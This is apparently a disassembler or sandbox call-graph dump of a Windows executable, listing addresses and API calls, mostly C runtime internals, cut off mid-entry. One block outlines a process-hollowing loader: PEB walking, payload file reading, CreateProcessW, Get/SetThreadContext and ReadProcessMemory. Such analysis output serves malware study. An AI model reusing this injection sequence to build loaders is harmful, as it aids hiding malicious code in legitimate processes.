13559->13561 13560 1071015 13560->13480 13560->13500 13561->13560 13562->13560 13563 107100f SetStdHandle 13562->13563 13563->13560 13658->13521 13674 1064ebd LeaveCriticalSection 13659->13674 13661 1070ce4 13661->13532 13663 1070b7f __expandlocale 13662->13663 13664 1070bcc EnterCriticalSection 13663->13664 13666 1064d39 __lock 70 API calls 13663->13666 13665 1070bf2 __expandlocale 13664->13665 13665->13536 13667 1070ba3 13666->13667 13668 1070bc0 13667->13668 13669 1070bae InitializeCriticalSectionAndSpinCount 13667->13669 13675 1070bf6 13668->13675 13669->13668 13678 1064ebd LeaveCriticalSection 13671->13678 13673 1070dac 13673->13522 13674->13661 13676 1064ebd _doexit LeaveCriticalSection 13675->13676 13677 1070bfd 13676->13677 13677->13664 13678->13673 13782->13505 13784 107216d 13783->13784 13792 1072184 13783->13792 13785 1072174 13784->13785 13787 1072195 13784->13787 13786 10647cc __woutput_s_l 70 API calls 13785->13786 13788 1072179 13786->13788 13794 1065839 13787->13794 13790 106471d __woutput_s_l 9 API calls 13788->13790 13790->13792 13791 1075248 82 API calls __towlower_l 13793 10721a0 13791->13793 13792->13412 13793->13791 13793->13792 13795 1065897 13794->13795 13796 106584a 13794->13796 13795->13793 13797 106b2ad __expandlocale 70 API calls 13796->13797 13798 106584f 13797->13798 13799 1065878 13798->13799 13802 10702e6 13798->13802 13799->13795 13817 106d939 13799->13817 13803 10702f2 __expandlocale 13802->13803 13804 106b2ad __expandlocale 70 API calls 13803->13804 13805 10702f7 13804->13805 13806 1070326 13805->13806 13808 107030a 13805->13808 13807 1064d39 __lock 70 API calls 13806->13807 13809 107032d 13807->13809 13810 106b2ad __expandlocale 70 API calls 13808->13810 13833 1070362 13809->13833 13812 107030f 13810->13812 13815 107031d __expandlocale 13812->13815 13816 106526f __amsg_exit 70 API calls 13812->13816 13815->13799 13816->13815 13818 106d945 __expandlocale 13817->13818 13819 106b2ad __expandlocale 70 API calls 13818->13819 13820 106d94a 13819->13820 13821 106d95d 13820->13821 13822 1064d39 __lock 70 API calls 13820->13822 13824 106d96b __expandlocale 13821->13824 13826 106526f __amsg_exit 70 API calls 13821->13826 13823 106d97b 13822->13823 13825 106d9c4 13823->13825 13828 106d992 InterlockedDecrement 13823->13828 13829 106d9ac InterlockedIncrement 13823->13829 13824->13795 13889 106d9d5 13825->13889 13826->13824 13828->13829 13830 106d99d 13828->13830 13829->13825 13830->13829 13831 1064ed2 _free 70 API calls 13830->13831 13832 106d9ab 13831->13832 13832->13829 13834 107036d 13833->13834 13835 1070341 13833->13835 13834->13835 13836 1070061 ___addlocaleref 8 API calls 13834->13836 13841 1070359 13835->13841 13837 1070383 13836->13837 13837->13835 13844 107024b 13837->13844 13888 1064ebd LeaveCriticalSection 13841->13888 13843 1070360 13843->13812 13845 10702e1 13844->13845 13846 107025a InterlockedDecrement 13844->13846 13845->13835 13858 10700f1 13845->13858 13847 1070270 13846->13847 13848 107026b InterlockedDecrement 13846->13848 13849 107027d 13847->13849 13850 107027a InterlockedDecrement 13847->13850 13848->13847 13851 1070283 InterlockedDecrement 13849->13851 13852 1070288 13849->13852 13850->13849 13851->13852 13853 1070292 InterlockedDecrement 13852->13853 13855 1070295 13852->13855 13853->13855 13854 10702ac InterlockedDecrement 13854->13855 13855->13854 13856 10702bf InterlockedDecrement 13855->13856 13857 10702d0 InterlockedDecrement 13855->13857 13856->13855 13857->13845 13859 1070106 13858->13859 13860 107016a 13858->13860 13859->13860 13867 1070137 13859->13867 13870 1064ed2 _free 70 API calls 13859->13870 13861 10701b7 13860->13861 13862 1064ed2 _free 70 API calls 13860->13862 13863 1073a4e ___free_lc_time 70 API calls 13861->13863 13873 10701e0 13861->13873 13864 107018b 13862->13864 13865 10701d5 13863->13865 13868 1064ed2 _free 70 API calls 13864->13868 13871 1064ed2 _free 70 API calls 13865->13871 13866 1070155 13869 1064ed2 _free 70 API calls 13866->13869 13867->13866 13878 1064ed2 _free 70 API calls 13867->13878 13874 107019e 13868->13874 13875 107015f 13869->13875 13876 107012c 13870->13876 13871->13873 13872 107023f 13877 1064ed2 _free 70 API calls 13872->13877 13873->13872 13886 1064ed2 70 API calls _free 13873->13886 13879 1064ed2 _free 70 API calls 13874->13879 13880 1064ed2 _free 70 API calls 13875->13880 13881 10732d1 ___free_lconv_mon 70 API calls 13876->13881 13882 1070245 13877->13882 13883 107014a 13878->13883 13884 10701ac 13879->13884 13880->13860 13881->13867 13882->13835 13885 10737a7 ___free_lconv_num 70 API calls 13883->13885 13887 1064ed2 _free 70 API calls 13884->13887 13885->13866 13886->13873 13887->13861 13888->13843 13892 1064ebd LeaveCriticalSection 13889->13892 13891 106d9dc 13891->13821 13892->13891 13894 1062ec7 LeaveCriticalSection 13893->13894 13895 1062ea8 13893->13895 13894->13386 13895->13894 13896 1062eaf 13895->13896 13899 1064ebd LeaveCriticalSection 13896->13899 13898 1062ec4 13898->13386 13899->13898 13901 1062e5c EnterCriticalSection 13900->13901 13902 1062e3a 13900->13902 13904 1062e52 13901->13904 13902->13901 13903 1062e42 13902->13903 13905 1064d39 __lock 70 API calls 13903->13905 13906 1063325 13904->13906 13905->13904 13907 1063343 13906->13907 13908 1063333 13906->13908 13910 1063359 13907->13910 13961 1063433 13907->13961 13909 10647cc __woutput_s_l 70 API calls 13908->13909 13911 1063338 13909->13911 13921 1064b93 13910->13921 13918 106342b 13911->13918 13916 106339a 13934 106761f 13916->13934 13919 1062e99 _fseek 2 API calls 13918->13919 13920 1063431 13919->13920 13920->13210 13922 1064ba6 13921->13922 13923 106336c 13921->13923 13922->13923 13924 1065573 __output_p_l 70 API calls 13922->13924 13927 1065573 13923->13927 13925 1064bc3 13924->13925 13926 106bef0 __write 103 API calls 13925->13926 13926->13923 13928 1065592 13927->13928 13929 106557d 13927->13929 13928->13916 13930 10647cc __woutput_s_l 70 API calls 13929->13930 13931 1065582 13930->13931 13932 106471d __woutput_s_l 9 API calls 13931->13932 13933 106558d 13932->13933 13933->13916 13935 106762b __expandlocale 13934->13935 13936 1067633 13935->13936 13937 106764b 13935->13937 13938 1064798 __chsize_s 70 API calls 13936->13938 13990 1066594 InitOnceExecuteOnce 13937->13990 13940 1067638 13938->13940 13941 10647cc __woutput_s_l 70 API calls 13940->13941 13945 1067640 __expandlocale 13941->13945 13942 10676ed 13944 1064798 __chsize_s 70 API calls 13942->13944 13943 1067650 13943->13942 13943->13945 13946 106768a 13943->13946 13947 10676f2 13944->13947 13945->13911 13948 1070b73 ___lock_fhandle 72 API calls 13946->13948 13949 10647cc __woutput_s_l 70 API calls 13947->13949 13950 1067690 13948->13950 13951 10676fa 13949->13951 13952 10676b6 13950->13952 13953 10676a3 13950->13953 13954 106471d __woutput_s_l 9 API calls 13951->13954 13956 10647cc __woutput_s_l 70 API calls 13952->13956 13991 106770e 13953->13991 13954->13945 13958 10676bb 13956->13958 13957 10676af 14001 10676e5 13957->14001 13959 1064798 __chsize_s 70 API calls 13958->13959 13959->13957 13962 1063440 __ftell_nolock 13961->13962 13963 1063470 13962->13963 13964 1063458 13962->13964 13965 1065573 __output_p_l 70 API calls 13963->13965 13966 10647cc __woutput_s_l 70 API calls 13964->13966 13967 1063477 13965->13967 13968 106345d 13966->13968 13970 106761f __write 76 API calls 13967->13970 13969 106471d __woutput_s_l 9 API calls 13968->13969 13988 1063468 13969->13988 13971 1063493 13970->13971 13974 1063503 13971->13974 13975 106367d 13971->13975 13971->13988 13972 10678fa __expandlocale 6 API calls 13973 106378a 13972->13973 13973->13910 13977 1063530 13974->13977 13981 1063628 13974->13981 13976 1063683 13975->13976 13975->13981 13978 10647cc __woutput_s_l 70 API calls 13976->13978 13977->13988 14005 1067780 13977->14005 13978->13988 13980 1063562 13983 106358e ReadFile 13980->13983 13980->13988 13982 106761f __write 76 API calls 13981->13982 13981->13988 13984 10636e3 13982->13984 13985 10635b4 13983->13985 13983->13988 13987 106761f __write 76 API calls 13984->13987 13984->13988 13986 106761f __write 76 API calls 13985->13986 13989 10635c2 13986->13989 13987->13988 13988->13972 13989->13988 13990->13943 13992 1070e34 __get_osfhandle 71 API calls 13991->13992 13993 106771b 13992->13993 13994 1067731 SetFilePointer 13993->13994 13995 1067721 13993->13995 13997 1067752 13994->13997 13998 106774a GetLastError 13994->13998 13996 10647cc __woutput_s_l 70 API calls 13995->13996 13999 1067726 13996->13999 13997->13999 14000 10647ab __dosmaperr 70 API calls 13997->14000 13998->13997 13999->13957 14000->13999 14004 107103e LeaveCriticalSection 14001->14004 14003 10676eb 14003->13945 14004->14003 14006 106778c __expandlocale 14005->14006 14007 10677b5 14006->14007 14008 106779d 14006->14008 14032 1066594 InitOnceExecuteOnce 14007->14032 14010 1064798 __chsize_s 70 API calls 14008->14010 14011 10677a2 14010->14011 14012 10647cc __woutput_s_l 70 API calls 14011->14012 14018 10677aa __expandlocale 14012->14018 14013 1067867 14014 1064798 __chsize_s 70 API calls 14013->14014 14016 106786c 14014->14016 14015 10677ba 14015->14013 14017 10677f7 14015->14017 14015->14018 14019 10647cc __woutput_s_l 70 API calls 14016->14019 14020 1070b73 ___lock_fhandle 72 API calls 14017->14020 14018->13980 14021 1067874 14019->14021 14022 10677fd 14020->14022 14023 106471d __woutput_s_l 9 API calls 14021->14023 14024 1067813 14022->14024 14025 106782b 14022->14025 14023->14018 14026 1067889 __lseeki64_nolock 73 API calls 14024->14026 14027 10647cc __woutput_s_l 70 API calls 14025->14027 14028 1067822 14026->14028 14029 1067830 14027->14029 14033 106785f 14028->14033 14030 1064798 __chsize_s 70 API calls 14029->14030 14030->14028 14032->14015 14036 107103e LeaveCriticalSection 14033->14036 14035 1067865 14035->14018 14036->14035 14038 1062e99 _fseek 2 API calls 14037->14038 14039 10637f2 14038->14039 14039->13223 14041 10632a0 __expandlocale 14040->14041 14042 10632e3 14041->14042 14043 10632db __expandlocale 14041->14043 14047 10632b6 _memset 14041->14047 14044 1062e2a __lock_file 71 API calls 14042->14044 14043->13226 14046 10632e9 14044->14046 14045 10647cc __woutput_s_l 70 API calls 14048 10632d0 14045->14048 14053 10630b6 14046->14053 14047->14045 14050 106471d __woutput_s_l 9 API calls 14048->14050 14050->14043 14055 10630d1 _memset 14053->14055 14060 10630ec 14053->14060 14054 10630dc 14056 10647cc __woutput_s_l 70 API calls 14054->14056 14055->14054 14055->14060 14064 106312a 14055->14064 14057 10630e1 14056->14057 14058 106471d __woutput_s_l 9 API calls 14057->14058 14058->14060 14067 106331d 14060->14067 14061 106323b _memset 14065 10647cc __woutput_s_l 70 API calls 14061->14065 14063 1065573 __output_p_l 70 API calls 14063->14064 14064->14060 14064->14061 14064->14063 14070 1066e85 14064->14070 14140 1066b25 14064->14140 14162 1066c53 14064->14162 14065->14057 14068 1062e99 _fseek 2 API calls 14067->14068 14069 1063323 14068->14069 14069->14043 14071 1066ea6 14070->14071 14072 1066ebd 14070->14072 14073 1064798 __chsize_s 70 API calls 14071->14073 14176 1066594 InitOnceExecuteOnce 14072->14176 14075 1066eab 14073->14075 14076 10647cc __woutput_s_l 70 API calls 14075->14076 14120 1066eb2 14076->14120 14077 1067600 14079 1064798 __chsize_s 70 API calls 14077->14079 14078 1066ec2 14078->14077 14080 1066f02 14078->14080 14078->14120 14081 1067605 14079->14081 14082 1066f0a 14080->14082 14089 1066f21 14080->14089 14083 10647cc __woutput_s_l 70 API calls 14081->14083 14084 1064798 __chsize_s 70 API calls 14082->14084 14085 1066f16 14083->14085 14086 1066f0f 14084->14086 14087 106471d __woutput_s_l 9 API calls 14085->14087 14091 10647cc __woutput_s_l 70 API calls 14086->14091 14087->14120 14088 1066f36 14092 1064798 __chsize_s 70 API calls 14088->14092 14089->14088 14090 1066f50 14089->14090 14093 1066f6e 14089->14093 14089->14120 14090->14088 14095 1066f5b 14090->14095 14091->14085 14092->14086 14094 1064f54 __malloc_crt 70 API calls 14093->14094 14096 1066f7e 14094->14096 14097 106fffd __isatty 71 API calls 14095->14097 14098 1066f86 14096->14098 14099 1066fa1 14096->14099 14100 106706f 14097->14100 14102 10647cc __woutput_s_l 70 API calls 14098->14102 14101 1067889 __lseeki64_nolock 73 API calls 14099->14101 14103 10670e8 ReadFile 14100->14103 14104 1067085 GetConsoleMode 14100->14104 14101->14095 14105 1066f8b 14102->14105 14106 106710a 14103->14106 14107 10675c8 GetLastError 14103->14107 14108 10670e5 14104->14108 14109 1067099 14104->14109 14110 1064798 __chsize_s 70 API calls 14105->14110 14106->14107 14114 10670da 14106->14114 14111 10675d5 14107->14111 14112 10670c8 14107->14112 14108->14103 14109->14108 14113 106709f ReadConsoleW 14109->14113 14110->14120 14115 10647cc __woutput_s_l 70 API calls 14111->14115 14117 10647ab __dosmaperr 70 API calls 14112->14117 14124 10670ce 14112->14124 14113->14114 14116 10670c2 GetLastError 14113->14116 14122 10673ac 14114->14122 14123 106713f 14114->14123 14114->14124 14118 10675da 14115->14118 14116->14112 14117->14124 14119 1064798 __chsize_s 70 API calls 14118->14119 14119->14124 14120->14064 14121 1064ed2 _free 70 API calls 14121->14120 14122->14124 14127 10674b2 ReadFile 14122->14127 14126 10671ab ReadFile 14123->14126 14128 106722c 14123->14128 14124->14120 14124->14121 14129 10671cc GetLastError 14126->14129 14139 10671d6 14126->14139 14133 10674d5 GetLastError 14127->14133 14138 10674e3 14127->14138 14128->14124 14130 10672e9 14128->14130 14131 10672d9 14128->14131 14134 1067299 MultiByteToWideChar 14128->14134 14129->14139 14130->14134 14135 1067889 __lseeki64_nolock 73 API calls 14130->14135 14132 10647cc __woutput_s_l 70 API calls 14131->14132 14132->14124 14133->14138 14134->14116 14134->14124 14135->14134 14138->14122 14139->14123 14141 1066b45 14140->14141 14142 1066b30 14140->14142 14177 1066594 InitOnceExecuteOnce 14141->14177 14143 10647cc __woutput_s_l 70 API calls 14142->14143 14145 1066b35 14143->14145 14147 106471d __woutput_s_l 9 API calls 14145->14147 14146 1066b4a 14148 1066b87 14146->14148 14153 1066b40 14146->14153 14210 1070a65 14146->14210 14147->14153 14150 1065573 __output_p_l 70 API calls 14148->14150 14151 1066b9b 14150->14151 14178 1066d70 14151->14178 14153->14064 14154 1066ba2 14154->14153 14155 1065573 __output_p_l 70 API calls 14154->14155 14156 1066bc5 14155->14156 14156->14153 14157 1065573 __output_p_l 70 API calls 14156->14157 14163 1066c62 14162->14163 14172 1066c5e _memmove 14162->14172 14164 1066c69 14163->14164 14168 1066c7c _memset 14163->14168 14165 10647cc __woutput_s_l 70 API calls 14164->14165 14166 1066c6e 14165->14166 14167 106471d __woutput_s_l 9 API calls 14166->14167 14167->14172 14169 1066cb3 14168->14169 14170 1066caa 14168->14170 14168->14172 14169->14172 14174 10647cc __woutput_s_l 70 API calls 14169->14174 14171 10647cc __woutput_s_l 70 API calls 14170->14171 14173 1066caf 14171->14173 14172->14064 14175 106471d __woutput_s_l 9 API calls 14173->14175 14174->14173 14175->14172 14176->14078 14177->14146 14179 1066d7c __expandlocale 14178->14179 14180 1066d84 14179->14180 14181 1066d9c 14179->14181 14182 1064798 __chsize_s 70 API calls 14180->14182 14213 1066594 InitOnceExecuteOnce 14181->14213 14184 1066d89 14182->14184 14185 10647cc __woutput_s_l 70 API calls 14184->14185 14187 1066d91 __expandlocale 14185->14187 14186 1066e64 14189 1064798 __chsize_s 70 API calls 14186->14189 14187->14154 14188 1066da1 14188->14186 14188->14187 14190 1066ddf 14188->14190 14191 1066e69 14189->14191 14192 1066e01 14190->14192 14193 1066dec 14190->14193 14194 10647cc __woutput_s_l 70 API calls 14191->14194 14196 1070b73 ___lock_fhandle 72 API calls 14192->14196 14195 1064798 __chsize_s 70 API calls 14193->14195 14197 1066df9 14194->14197 14198 1066df1 14195->14198 14199 1066e07 14196->14199 14200 10647cc __woutput_s_l 70 API calls 14198->14200 14201 1066e2d 14199->14201 14202 1066e1a 14199->14202 14200->14197 14211 1064f54 __malloc_crt 70 API calls 14210->14211 14212 1070a7a 14211->14212 14212->14148 14213->14188 14219 106165f lstrlenW GetProcessHeap HeapAlloc 14218->14219 14219->13230 14219->13231 14226 1062b4e 14220->14226 14222 1061712 14222->13256 14223 1061c70 14222->14223 14243 1063938 14223->14243 14227 1062b5e 14226->14227 14228 1062b64 14227->14228 14234 1062b89 14227->14234 14229 10647cc __woutput_s_l 70 API calls 14228->14229 14230 1062b69 14229->14230 14231 106471d __woutput_s_l 9 API calls 14230->14231 14233 1062b74 14231->14233 14233->14222 14236 1062baa wcstoxq 14234->14236 14238 10648bf 14234->14238 14235 10647cc __woutput_s_l 70 API calls 14237 1062c70 14235->14237 14236->14235 14236->14237 14237->14222 14239 10648d5 14238->14239 14240 10648d1 14238->14240 14241 10648df 14239->14241 14242 10648ed GetStringTypeW 14239->14242 14240->14234 14241->14234 14242->14241 14246 1063960 14243->14246 14247 1063992 14246->14247 14248 106397a 14246->14248 14251 10639a1 14247->14251 14256 10639b9 14247->14256 14249 10647cc __woutput_s_l 70 API calls 14248->14249 14250 106397f 14249->14250 14252 106471d __woutput_s_l 9 API calls 14250->14252 14253 10647cc __woutput_s_l 70 API calls 14251->14253 14259 106173d CreateFileW 14252->14259 14254 10639a6 14253->14254 14255 106471d __woutput_s_l 9 API calls 14254->14255 14255->14259 14258 1063a00 14256->14258 14256->14259 14261 106793b 14256->14261 14258->14259 14260 106793b __fputwc_nolock 103 API calls 14258->14260 14259->13259 14259->13260 14260->14259 14285 1066594 InitOnceExecuteOnce 14261->14285 14263 1067944 14264 1067948 14263->14264 14265 1065573 __output_p_l 70 API calls 14263->14265 14264->14258 14266 1067958 14265->14266 14267 1067963 14266->14267 14268 1067970 14266->14268 14269 10647cc __woutput_s_l 70 API calls 14267->14269 14270 1067975 14268->14270 14278 106798c _vwprintf_helper 14268->14278 14272 1067968 14269->14272 14271 10647cc __woutput_s_l 70 API calls 14270->14271 14271->14272 14272->14258 14273 10679f0 14276 1067a0a 14273->14276 14280 1067a21 14273->14280 14274 1067a6a 14275 106bef0 __write 103 API calls 14274->14275 14275->14272 14277 106bef0 __write 103 API calls 14276->14277 14277->14272 14278->14272 14279 106fffd __isatty 71 API calls 14278->14279 14281 10679db 14278->14281 14284 10679e6 14278->14284 14279->14281 14280->14272 14282 1067780 __lseeki64 76 API calls 14280->14282 14283 1070a65 __getbuf 70 API calls 14281->14283 14281->14284 14282->14272 14283->14284 14284->14273 14284->14274 14285->14263 14287 1062f73 __expandlocale 14286->14287 14288 1062f86 14287->14288 14290 1062faa 14287->14290 14289 10647cc __woutput_s_l 70 API calls 14288->14289 14291 1062f8b 14289->14291 14311 1066594 InitOnceExecuteOnce 14290->14311 14293 106471d __woutput_s_l 9 API calls 14291->14293 14297 1062f96 __expandlocale 14293->14297 14294 1062faf 14295 1062e2a __lock_file 71 API calls 14294->14295 14294->14297 14296 1062fbc 14295->14296 14298 1063031 14296->14298 14299 1065573 __output_p_l 70 API calls 14296->14299 14297->13294 14300 106305d 14298->14300 14312 1065793 14298->14312 14308 1062fcc 14299->14308 14349 106307a 14300->14349 14306 10647cc __woutput_s_l 70 API calls 14309 1063026 14306->14309 14308->14298 14308->14306 14310 106471d __woutput_s_l 9 API calls 14309->14310 14310->14298 14311->14294 14313 1065573 __output_p_l 70 API calls 14312->14313 14314 10657a0 14313->14314 14315 106fffd __isatty 71 API calls 14314->14315 14316 10657a6 _vwprintf_helper 14315->14316 14317 1064f54 __malloc_crt 70 API calls 14316->14317 14318 1063041 14316->14318 14317->14318 14319 10658d2 14318->14319 14320 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 14319->14320 14321 106593f 14320->14321 14322 10647cc __woutput_s_l 70 API calls 14321->14322 14323 1065944 14322->14323 14352 1066594 InitOnceExecuteOnce 14323->14352 14325 1065ab6 14331 10678fa __expandlocale 6 API calls 14325->14331 14326 1066420 14327 10647cc __woutput_s_l 70 API calls 14326->14327 14329 1066425 14327->14329 14328 106594f 14328->14325 14328->14326 14330 1065573 __output_p_l 70 API calls 14328->14330 14335 106596b __aulldvrm __woutput_s_l _strlen 14328->14335 14332 106471d __woutput_s_l 9 API calls 14329->14332 14330->14335 14333 1063051 14331->14333 14332->14325 14345 1065762 14333->14345 14335->14325 14335->14326 14336 10664aa 103 API calls _write_string 14335->14336 14337 1066020 DecodePointer 14335->14337 14338 10664f0 103 API calls _write_multi_char 14335->14338 14339 106651c 103 API calls _write_string 14335->14339 14340 1064ed2 _free 70 API calls 14335->14340 14341 1064f54 __malloc_crt 70 API calls 14335->14341 14342 1066083 DecodePointer 14335->14342 14343 10660a8 DecodePointer 14335->14343 14344 10709b5 82 API calls __cftof 14335->14344 14353 10703f5 14335->14353 14336->14335 14337->14335 14338->14335 14339->14335 14340->14335 14341->14335 14342->14335 14343->14335 14344->14335 14346 106577e 14345->14346 14347 106576b 14345->14347 14346->14300 14347->14346 14348 1064b93 __flush 103 API calls 14347->14348 14348->14346 14350 1062e99 _fseek 2 API calls 14349->14350 14351 1063080 14350->14351 14351->14297 14352->14328 14354 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 14353->14354 14355 1070406 14354->14355 14355->14335 14359 1065430 14356->14359 14358 106528a 14360 106543c __expandlocale 14359->14360 14361 1064d39 __lock 63 API calls 14360->14361 14362 1065443 14361->14362 14363 1065471 DecodePointer 14362->14363 14366 10654fc __initterm 14362->14366 14363->14366 14367 1065488 DecodePointer 14363->14367 14379 106554a 14366->14379 14372 1065498 14367->14372 14368 1065559 __expandlocale 14368->14358 14370 10654a5 EncodePointer 14370->14372 14371 1065541 14373 106554a 14371->14373 14374 1065152 _fast_error_exit 3 API calls 14371->14374 14372->14366 14372->14370 14375 10654b5 DecodePointer EncodePointer 14372->14375 14376 1065557 14373->14376 14384 1064ebd LeaveCriticalSection 14373->14384 14374->14373 14378 10654c7 DecodePointer DecodePointer 14375->14378 14376->14358 14378->14372 14380 1065550 14379->14380 14381 106552a 14379->14381 14385 1064ebd LeaveCriticalSection 14380->14385 14381->14368 14383 1064ebd LeaveCriticalSection 14381->14383 14383->14371 14384->14376 14385->14381 15173 106d1a2 15174 106d1ae __expandlocale 15173->15174 15175 1064d39 __lock 70 API calls 15174->15175 15176 106d1b5 15175->15176 15177 106d1d5 DecodePointer 15176->15177 15178 106d1c0 DecodePointer 15176->15178 15179 106d1e8 15177->15179 15178->15179 15180 106d204 15179->15180 15181 106d1fa EncodePointer 15179->15181 15184 106d21e 15180->15184 15181->15180 15183 106d210 __expandlocale 15187 1064ebd LeaveCriticalSection 15184->15187 15186 106d225 15186->15183 15187->15186 15214 106ddb0 15215 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 15214->15215 15216 106de1d 15215->15216 15217 10647cc __woutput_s_l 70 API calls 15216->15217 15218 106de22 15217->15218 15240 1066594 InitOnceExecuteOnce 15218->15240 15220 106dfbb 15226 10678fa __expandlocale 6 API calls 15220->15226 15221 106df9c 15221->15220 15222 10647cc __woutput_s_l 70 API calls 15221->15222 15224 106dfb0 15222->15224 15223 106de2d 15223->15220 15223->15221 15225 1065573 __output_p_l 70 API calls 15223->15225 15234 106de49 __aulldvrm __woutput_s_l _strlen 15223->15234 15227 106471d __woutput_s_l 9 API calls 15224->15227 15225->15234 15228 106dfde 15226->15228 15227->15220 15229 10703f5 __isleadbyte_l 80 API calls 15229->15234 15230 106e96c 103 API calls _write_multi_char 15230->15234 15231 106e54b DecodePointer 15231->15234 15232 1064ed2 _free 70 API calls 15232->15234 15233 1064f54 __malloc_crt 70 API calls 15233->15234 15234->15220 15234->15221 15234->15229 15234->15230 15234->15231 15234->15232 15234->15233 15235 106e5ae DecodePointer 15234->15235 15236 106e9de 103 API calls _write_string 15234->15236 15237 106e5d3 DecodePointer 15234->15237 15238 10709b5 82 API calls __cftof 15234->15238 15239 106e9b2 103 API calls _write_multi_char 15234->15239 15235->15234 15236->15234 15237->15234 15238->15234 15239->15234 15240->15223 14386 5e08b7 14398 5e005f GetPEB 14386->14398 14388 5e0919 14399 5e0838 14388->14399 14390 5e0921 14391 5e09b4 14390->14391 14392 5e09d0 CreateFileW 14390->14392 14392->14391 14393 5e09fa VirtualAlloc ReadFile 14392->14393 14393->14391 14396 5e0a27 14393->14396 14394 5e0a40 14396->14394 14397 5e0e4e ExitProcess 14396->14397 14412 5e020a 14396->14412 14398->14388 14427 5e005f GetPEB 14399->14427 14401 5e084c 14428 5e005f GetPEB 14401->14428 14403 5e085f 14429 5e005f GetPEB 14403->14429 14405 5e0872 14430 5e07da 14405->14430 14407 5e0880 14408 5e089c VirtualAllocExNuma 14407->14408 14409 5e08a9 14408->14409 14435 5e073a 14409->14435 14442 5e005f GetPEB 14412->14442 14414 5e03b3 14414->14396 14415 5e03c1 CreateProcessW 14416 5e03f0 GetThreadContext 14415->14416 14419 5e03eb 14415->14419 14417 5e0410 ReadProcessMemory 14416->14417 14416->14419 14417->14419 14424 5e0218 14417->14424 14419->14414 14470 5e1208 14419->14470 14420 5e13b7 11 API calls 14420->14424 14423 5e0675 SetThreadContext 14423->14419 14423->14424 14424->14414 14424->14415 14424->14419 14424->14420 14424->14423 14426 5e1208 11 API calls 14424->14426 14443 5e129d 14424->14443 14452 5e1056 14424->14452 14461 5e1157 14424->14461 14426->14424 14427->14401 14428->14403 14429->14405 14440 5e005f GetPEB 14430->14440 14432 5e07ea 14433 5e07f0 GetSystemInfo 14432->14433 14434 5e081b 14433->14434 14434->14407 14441 5e005f GetPEB 14435->14441 14437 5e0746 14438 5e0766 VirtualAlloc 14437->14438 14439 5e0783 14438->14439 14439->14390 14440->14432 14441->14437 14442->14424 14444 5e12b8 14443->14444 14479 5e013e GetPEB 14444->14479 14446 5e12d9 14447 5e1391 14446->14447 14448 5e12e1 14446->14448 14496 5e16e3 14447->14496 14481 5e0e57 14448->14481 14451 5e1378 14451->14424 14453 5e1071 14452->14453 14454 5e013e GetPEB 14453->14454 14455 5e1092 14454->14455 14456 5e109a 14455->14456 14457 5e1124 14455->14457 14459 5e0e57 10 API calls 14456->14459 14506 5e1707 14457->14506 14460 5e110b 14459->14460 14460->14424 14462 5e1172 14461->14462 14463 5e013e GetPEB 14462->14463 14464 5e1193 14463->14464 14465 5e11dd 14464->14465 14466 5e1197 14464->14466 14509 5e1719 14465->14509 14467 5e0e57 10 API calls 14466->14467 14469 5e11d2 14467->14469 14469->14424 14471 5e121b 14470->14471 14472 5e013e GetPEB 14471->14472 14473 5e123c 14472->14473 14474 5e1286 14473->14474 14475 5e1240 14473->14475 14512 5e16d1 14474->14512 14476 5e0e57 10 API calls 14475->14476 14478 5e127b 14476->14478 14478->14414 14480 5e0160 14479->14480 14480->14446 14499 5e005f GetPEB 14481->14499 14483 5e0ea0 14500 5e0109 GetPEB 14483->14500 14486 5e0f2d 14487 5e0f3e VirtualAlloc 14486->14487 14490 5e1002 14486->14490 14488 5e0f54 ReadFile 14487->14488 14487->14490 14489 5e0f69 VirtualAlloc 14488->14489 14488->14490 14489->14490 14493 5e0f8a 14489->14493 14491 5e104b 14490->14491 14492 5e1040 VirtualFree 14490->14492 14491->14451 14492->14491 14493->14490 14494 5e0ff5 VirtualFree 14493->14494 14495 5e0ff1 FindCloseChangeNotification 14493->14495 14494->14490 14495->14494 14497 5e0e57 10 API calls 14496->14497 14498 5e16ed 14497->14498 14498->14451 14499->14483 14501 5e011c 14500->14501 14503 5e0131 CreateFileW 14501->14503 14504 5e017b GetPEB 14501->14504 14503->14486 14503->14490 14505 5e019f 14504->14505 14505->14501 14507 5e0e57 10 API calls 14506->14507 14508 5e1711 14507->14508 14508->14460 14510 5e0e57 10 API calls 14509->14510 14511 5e1723 14510->14511 14511->14469 14513 5e0e57 10 API calls 14512->14513 14514 5e16db 14513->14514 14514->14478 16390 106cdf7 16393 106ce00 16390->16393 16394 1064d39 __lock 70 API calls 16393->16394 16395 106ce0b DecodePointer EncodePointer 16394->16395 16398 1064ebd LeaveCriticalSection 16395->16398 16397 106cdfe 16398->16397 16460 1062dfd 16467 1064bf7 16460->16467 16463 1062e10 16465 1064ed2 _free 70 API calls 16463->16465 16466 1062e1b 16465->16466 16480 1064c55 16467->16480 16469 1062e02 16469->16463 16470 1064ab0 16469->16470 16471 1064abc __expandlocale 16470->16471 16472 1064d39 __lock 70 API calls 16471->16472 16473 1064ac8 16472->16473 16474 1064b2d 16473->16474 16477 1064b01 DeleteCriticalSection 16473->16477 16497 106bd82 16473->16497 16510 1064b44 16474->16510 16479 1064ed2 _free 70 API calls 16477->16479 16478 1064b39 __expandlocale 16478->16463 16479->16473 16481 1064c61 __expandlocale 16480->16481 16482 1064d39 __lock 70 API calls 16481->16482 16489 1064c70 16482->16489 16483 1064d0e 16493 1064d30 16483->16493 16485 1062e69 _wprintf 71 API calls 16485->16489 16486 1064d1a __expandlocale 16486->16469 16488 1064b4d 107 API calls __fflush_nolock 16488->16489 16489->16483 16489->16485 16489->16488 16490 1064cfd 16489->16490 16491 1062ed3 __getstream 2 API calls 16490->16491 16492 1064d0b 16491->16492 16492->16489 16496 1064ebd LeaveCriticalSection 16493->16496 16495 1064d37 16495->16486 16496->16495 16498 106bd8e __expandlocale 16497->16498 16499 106bda2 16498->16499 16500 106bdba 16498->16500 16501 10647cc __woutput_s_l 70 API calls 16499->16501 16503 1062e2a __lock_file 71 API calls 16500->16503 16506 106bdb2 __expandlocale 16500->16506 16502 106bda7 16501->16502 16504 106471d __woutput_s_l 9 API calls 16502->16504 16505 106bdcc 16503->16505 16504->16506 16513 106bd16 16505->16513 16506->16473 16566 1064ebd LeaveCriticalSection 16510->16566 16512 1064b4b 16512->16478 16514 106bd25 16513->16514 16515 106bd39 16513->16515 16516 10647cc __woutput_s_l 70 API calls 16514->16516 16517 1064b93 __flush 103 API calls 16515->16517 16519 106bd35 16515->16519 16518 106bd2a 16516->16518 16520 